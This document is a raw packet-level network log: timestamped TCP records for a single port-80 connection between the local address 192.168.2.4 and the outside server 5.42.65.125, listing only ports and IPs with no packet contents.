Dec 27, 2023 18:12:25.524806023 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524807930 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524821043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524828911 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524830103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524840117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524852991 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524854898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524866104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524866104 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524873972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524883986 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524885893 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524893999 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524902105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.524904966 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524929047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.524951935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.525262117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525270939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525283098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525312901 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.525417089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525424957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525430918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525438070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525444984 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525456905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525459051 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.525464058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525475979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525481939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525487900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525494099 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525496006 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.525501013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525502920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.525509119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525521040 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.525537968 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.525593042 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525600910 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525613070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525635958 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.525660038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525666952 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525680065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525687933 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525702000 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.525737047 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.525738001 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525747061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525779963 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.525891066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525897980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525904894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.525934935 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.526189089 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526355028 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526361942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526374102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526381016 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526388884 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526400089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.526428938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.526470900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526479006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526489973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526495934 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526509047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526515007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526515007 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.526523113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526530981 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526536942 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.526536942 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526545048 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526546001 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.526551962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526563883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526571035 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.526572943 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526585102 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526602983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.526602983 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.526619911 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.526648998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526657104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526694059 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.526952982 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.526974916 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527018070 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527025938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527036905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527044058 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527051926 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527061939 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.527087927 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.527097940 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527122974 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527153015 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.527283907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527292013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527328014 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.527429104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527436972 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527447939 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527455091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527461052 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527472019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.527472973 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527481079 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527492046 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527497053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.527499914 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527510881 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527518034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527518034 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.527525902 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527537107 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527544022 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527549028 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.527556896 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527565002 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527576923 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.527579069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527604103 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.527626038 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.527901888 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527909994 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.527949095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528021097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528028965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528040886 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528048038 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528054953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528067112 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528069019 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528074980 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528085947 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528086901 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528101921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528120041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528126955 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528135061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528172016 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528198957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528207064 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528218985 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528224945 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528232098 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528247118 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528254986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528261900 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528269053 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528271914 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528275967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528283119 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528301954 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528312922 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528681040 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528688908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528701067 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528747082 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528759003 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528765917 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528778076 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528801918 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528803110 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528810978 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528825045 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528848886 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528929949 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528938055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528944969 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528951883 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528964043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528970957 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528971910 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528978109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528985977 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.528986931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.528994083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529020071 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.529048920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529056072 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529062986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529081106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529086113 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.529114962 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.529194117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529201031 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529213905 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529220104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529227018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529233932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529237032 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.529242039 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529267073 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.529292107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.529596090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529603958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529616117 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529630899 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529639006 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529645920 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.529645920 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529675961 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.529678106 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529696941 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529736042 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.529757023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529764891 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529777050 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529786110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529799938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.529824018 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.529834986 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529973030 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529980898 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529992104 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.529999018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530005932 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530018091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530023098 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530025959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530034065 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530039072 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530040979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530060053 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530073881 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530396938 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530404091 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530436993 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530441999 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530528069 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530534983 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530546904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530554056 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530566931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530571938 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530574083 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530586958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530594110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530597925 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530601025 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530615091 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530622959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530630112 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530682087 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530690908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530698061 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530723095 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530745029 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530746937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530755043 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530769110 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530776024 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530783892 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530791998 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530806065 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530834913 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530838013 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530844927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530855894 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530863047 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530869961 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530881882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.530881882 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530904055 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.530919075 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.531330109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531337976 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531385899 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.531404018 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531413078 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531419992 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531426907 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531445026 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.531449080 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531469107 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.531495094 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531502962 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531536102 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.531573057 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531611919 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.531652927 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531661034 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531673908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531701088 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.531791925 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531800032 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531811953 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531819105 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531825066 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531836987 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531837940 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.531845093 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531855106 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.531857967 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531864882 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.531877041 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.531899929 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.532098055 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532139063 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532202959 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532217979 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532244921 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.532263041 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532270908 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532299995 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532304049 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.532337904 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532344103 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532351017 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532357931 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532366037 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532378912 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.532406092 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.532449007 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532457113 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532468081 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532475948 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532483101 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532495022 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.532509089 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.532516956 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532524109 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532531023 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532537937 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532545090 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532552958 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532558918 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.532582998 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.532589912 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532704115 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532743931 CET	49738	80	192.168.2.4	5.42.65.125
Dec 27, 2023 18:12:25.532761097 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532768965 CET	80	49738	5.42.65.125	192.168.2.4
Dec 27, 2023 18:12:25.532776117 CET	80	49738	5.42.65.125	192.168.2.4
